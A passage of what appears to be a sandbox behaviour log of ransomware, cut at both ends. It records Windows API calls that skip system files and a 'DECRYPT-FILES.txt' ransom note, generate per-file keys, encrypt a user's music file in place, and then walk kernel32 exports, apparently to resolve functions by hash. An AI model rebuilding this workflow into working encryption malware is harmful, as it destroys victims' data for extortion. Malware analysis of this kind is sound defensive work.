2ucgoptg.mp3.krodor"), dwFlags=0x0) returned 1 [0085.790] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.790] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.790] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.790] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ee5830, ftCreationTime.dwHighDateTime=0x1d4d366, ftLastAccessTime.dwLowDateTime=0x4fac95d0, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0x4fac95d0, ftLastWriteTime.dwHighDateTime=0x1d4ceda, nFileSizeHigh=0x0, nFileSizeLow=0x12511, dwReserved0=0x0, dwReserved1=0x0, cFileName="qD8wKNVWw-K1Oehbsb.m4a", cAlternateFileName="QD8WKN~1.M4A")) returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="autorun.inf") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="boot.ini") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="desktop.ini") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="ntuser.dat") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="iconcache.db") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="bootsect.bak") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="ntuser.dat.log") returned 1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="thumbs.db") returned -1 [0085.791] lstrcmpiW (lpString1="qD8wKNVWw-K1Oehbsb.m4a", lpString2="Bootfont.bin") returned 1 [0085.791] lstrlenW (lpString="qD8wKNVWw-K1Oehbsb.m4a") returned 22 [0085.791] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0085.791] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0085.791] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0085.791] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0085.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.791] lstrlenW (lpString="qD8wKNVWw-K1Oehbsb.m4a") returned 22 [0085.791] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.791] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="qD8wKNVWw-K1Oehbsb.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a" [0085.791] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\qD8wKNVWw-K1Oehbsb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\qd8wknvww-k1oehbsb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.791] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=75025) returned 1 [0085.792] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.792] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.792] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.792] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.792] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.792] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.792] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.794] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.794] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.795] CloseHandle (hObject=0x43c) returned 1 [0085.795] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.795] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.796] CloseHandle (hObject=0x0) returned 0 [0085.796] CloseHandle (hObject=0x438) returned 1 [0085.796] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.797] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.797] GetTickCount () returned 0x114de7d [0085.797] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.798] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.798] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.798] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.798] lstrlenA (lpString="kernel32.dll") returned 12 [0085.798] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.798] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.798] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.799] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.799] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.799] lstrlenA (lpString="ADDATOMA") returned 8 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.799] lstrlenA (lpString="ADDATOMW") returned 8 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.799] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.799] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.799] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.799] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.799] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.799] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.799] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.799] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.799] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.799] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.799] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.799] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.799] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.799] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.799] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.800] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.800] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.800] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.800] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.800] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.800] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.800] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.800] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.800] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.800] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.800] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.800] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.800] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.800] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.800] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.800] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.800] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.800] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.800] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.801] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.801] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.801] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.801] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.801] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.801] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.801] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.801] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.801] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.801] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.801] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.801] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.801] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.801] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.801] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.801] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.801] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.801] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.801] lstrlenA (lpString="BEEP") returned 4 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.802] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.802] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.802] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.802] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.802] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.802] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.802] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.802] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.802] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.802] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.802] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.802] lstrlenA (lpString="CANCELIO") returned 8 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.802] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.802] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.802] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.802] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.802] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.802] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.802] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.803] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.803] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.803] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.803] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.803] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.803] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.803] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.803] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.803] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.803] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.803] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.803] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.803] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.803] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.803] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.803] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.803] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") 